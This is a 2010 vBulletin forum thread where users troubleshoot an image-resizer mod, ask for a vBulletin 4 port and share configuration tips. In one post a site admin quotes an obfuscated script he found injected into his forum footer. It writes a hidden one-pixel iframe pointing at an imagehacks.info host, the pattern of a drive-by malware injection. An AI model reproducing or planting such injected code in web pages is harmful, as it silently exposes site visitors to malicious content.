i've found a bug in the script.

when users link an image from their photobucket using the

< a href > tags the images will not resize.

but if they use the [ img ] tags, the images will resize.

is there a fix for this?

babynino 01-21-2010 04:39 PM

installed... 3.8.4 PL2, thumbnail resize on linked images doesn't work though :(

thanks so much for this mod

Hi Folks,

I'm using vB version 3.8.4 and I'm experience a problem with this MOD.

It was working very fine and a few weeks ago I needed to change my website host. I installed the vB from beginning in the new host and then added a backup of the database.
I installed this MOD again and then it doesn't work. I tried everything I could imagine and nothing happens. The images doesn't resize.

Any tips?

Thanks in advanve.

Did you make sure re-upload the client folder?

This mod works wonderfully. Installed and nominated. Greatest image resizer I could find!

Working great on 3.8.3

Is there a way to make a certain a forum not use the feature? Currently I'm just using HTML links for images I want linked.

RedHacker 01-24-2010 12:26 PM

Please can be update to the vBulletin 4....?

gnagplank6 01-26-2010 07:45 PM

This mod. should most definitely be upgraded to run on VB 4; it's one of the most important mods. to run a photo intensive forum.

Ditto. This is probably the most important mod for my forum. I would really like something like this for vB4...

gsk8 01-29-2010 09:45 AM

Bump....after nominating for mod of the month :)

I could not agree with you more. This add on is just great. Also the warning bar feature and how it allows you to click for the higher res version just rocks. It makes all the images in my forum look uniform and doesn't force contributors to re size their content to my specs.

We NEED this mod. for VB 4.0 STAT!!! :D

Has anyone ever figured out the error that a dozen or so admin have gotten in AdminCP when trying to change the settings?

dknelson 01-31-2010 11:58 AM

Does this mod add info to the footer regarding imagehacks.info?

Tettinntil 01-31-2010 07:49 PM

Installed. My AdminCP is not at all like the screenshot - where do I find other options for sizing. i.e. in signatures?

Step 4 in the instructions tells you exactly where to look:

Quote:

IV. Configuration
----------------------------------------
Go to your AdminCP -> vBulletin Options -> The Image Resizer - Options
...and configure this mod as you like.

Tettinntil 02-01-2010 10:29 AM

Yes, and that is where I looked. Found only image options for images in messages, nothing for limiting size in signatures.

Can anybody shed any light on this? I'm not complaining, just want to ensure that everything is OK. I have read about malware from Imagehacks and have temporarily removed this mod but I'm not even 100% sure that it is what added the info to the footer. If it did, and it's safe, that's fine but I would like to know for sure.

MagicThemeParks 02-01-2010 10:47 AM

dknelson, where do you see something added to the footer from this mod? Can you show an example of what you're seeing?

dknelson 02-01-2010 10:57 AM

OK...this one didn't come from my site because I have already removed it and didn't save it, sorry. I think this is pretty much exactly what I had also though. I found this doing a search. I found it at the very end of my footer.

<script>var _0x110261= ["\x77\x72\x69\x74\x65"]; var aBBcB=document; var ccccc = '<iframJQ21KL#AZ XLMS9Q21rc="http%3A%2F%2Fimg121.imagehacks.info%2F img121%2F103%2Fheader.jpeg" width="1" hJQ21KL#AZight="0" framJQ21KL#AZbordJQ21KL#AZr="0"></iframJQ21KL#AZ>'; var BBBcB = ccccc.replace(/XLMS9Q21/g,"s"); var ccBBB = BBBcB.replace(/LSM21ghk8/g,"o"); var cBcBc = ccBBB.replace(/JQ21KL#AZ/g,"e");aBBcB[_0x110261[0]](unescape(cBcBc));</script>

dknelson 02-03-2010 10:24 AM

OK....I manually removed the above code from my footer a few days ago. I let it go a couple of days and then I re-installed this mod. It did NOT add any such code to my footer so it was apparently NOT this mod that added it. At this point, I don'g know how that into got added. I do apologize for even bringing it up here.

Terminot 02-03-2010 11:27 AM

I'm using Lytebox and I've included the code as displayed on their website in the <head> of my vBulletin using the Common Templates in the style manager.

However, this does not always work. Sometimes I need to refresh the page multiple times before the image resize function works. Am I doing something wrong here?

Thanks in advance,
T.

How i can integrate/update the actual floatbox version v3.53.0?

Download the latest version and set your settings and licence key into floatbox.js.
Upload it to your site into the floatbox directory (under clientscripts), overwriting the existing script.

Find the template: tcattd_imageresizer_headinclude_floatbox

In that template find:

Code:

<script type="text/javascript">
<!--
  function setFloatboxOptions() {
    fb.resizeDuration = 3;
    fb.imageFadeDuration = 5;
    fb.overlayFadeDuration = 3;
    fb.navType = 'both';
    fb.theme = 'auto';
    fb.showUpperNav = 'always';
    fb.upperOpacity = 50;
    fb.resizeOrder = 'width';
    fb.preloadAll = 'false';
  };
//-->
</script>

And replace it with:

Code:

<script type="text/javascript">
<!--
fbPageOptions = {
  cornerRadius: 20
};

//-->
</script>

Now you can run your config page at:

../forum/clientscript/floatbox/configurator.html

and replace the red bit of code above with the output of the config page to change the settings (don't forget to CTRL F5 to see the new settings).

Worked for me!

I'm using vb 3.8.2 with Tcattitude Image resizer on. I would like to update to vb 4. Any chance to get this very fine Add-on updated to vb4, please ?
Thanks.

aquila125 02-20-2010 09:01 AM

Hi,

I've installed it in our 3.8.4p2 forum but it's not working. I've uploaded all the files to the clientscript folder but still nothing.. I tried Highslide, Lytebox and Shadowbox but the nothing changes on the forums.. If I look into the html code I see several references to the correct JS scripts..

What am I doing wrong? This looks like a great script that I would really like to have :)

tnx!

Aquila

Are there any plans to port this to vB4.
I love this implementation and would like to see it ported across if possible.

MagicThemeParks 02-25-2010 10:22 AM

This automatically worked with my vBadvanced page. But, I'd like to disable it on the homepage. Is there a way to do that?

burntire 02-26-2010 04:18 AM

Praying for a 4.0 version.

Niggoh 02-26-2010 08:04 AM

Using this version vBullentin version 3.8.4. Everything is working fine. Only exception: the highslide feature for attachments...

Anyone who can help to get this running again ?

I migrated the plugin to vb4 (I am not an expert regarding vb plugins, but I figured out some trick things)

so I am posting it here, but I will delete it if the author of this plugin prefers

I am not sure if its working 100%, I've made some tests and it seems fine to me

I've just installed it on my forum, so I dont have any feedback yet

Which files did you make changes to?

CCV_Pinto 03-01-2010 09:40 PM

only the xml file

but lots of changes =(

do you want me to upload the xml file alone?

burntire 03-01-2010 11:55 PM

I was just curious if I had to upload the entire package again. I will do some testing and see how it works.

redlabour 03-04-2010 11:03 AM

Any chance to get this updatedt? Or is there allready a working alternative out there?

DieselTruck 03-12-2010 01:29 AM

I lost my New Thread button in my Off Topic forum along with cutting out half of my VBProGarage system. I would love to get this updated for use.

fiveflat 03-16-2010 04:35 PM

How do I format my pages so that images appear side by side instead of one image "per line" as a verticle stack of images?

I have reviewed the XML file in this ZIP and there's nothing malicious in it that I see.

All he did basically was replace the old style <if>'s with <vb:if> and switched out variable names and stuff. In short, updated to the vB4 syntax.

However I've installed it on my forum and it doesn't seem to be working: http://forums.finalgear.com/test-for...-is-big-42995/

EDIT: The JS file isn't being loaded. Hmm.

EDIT #2: It'd help if I actually used the correct XML file and not the old one. Works fine now! :D

ShackMaster 04-04-2010 08:26 PM

I wish someone would pick this up and work on it more for 3.8 and 4.0.

Currently it will not W3C XHTML validate because it uses an invalid invocation method (onload does not exist on images).

Of course I keep saying this should be a default option in vBulletin anyway, but obviously they do not agree.

I agree. It'd be much appreciated if this could become one of the default features in the future releases of vBulletin.

That said, marked as installed. Excellent work and seems to be working just fine on my board. Thanks.

Jojonas 04-19-2010 09:21 AM

Graphics with a link in it don't work anymore. If i click on such a graphic, it highslides the picture but the forwardfunction is broken.

Max Paint 04-23-2010 09:08 PM

For me it works but I have to say that I only tried the parameters I had before in 3.8. and they still work ;)

An official new release for vB4 would be nice!

ShackMaster 04-24-2010 03:21 PM

I don't think the problem has ever been that it doesn't work, but rather that it will not validate W3C XHTML.
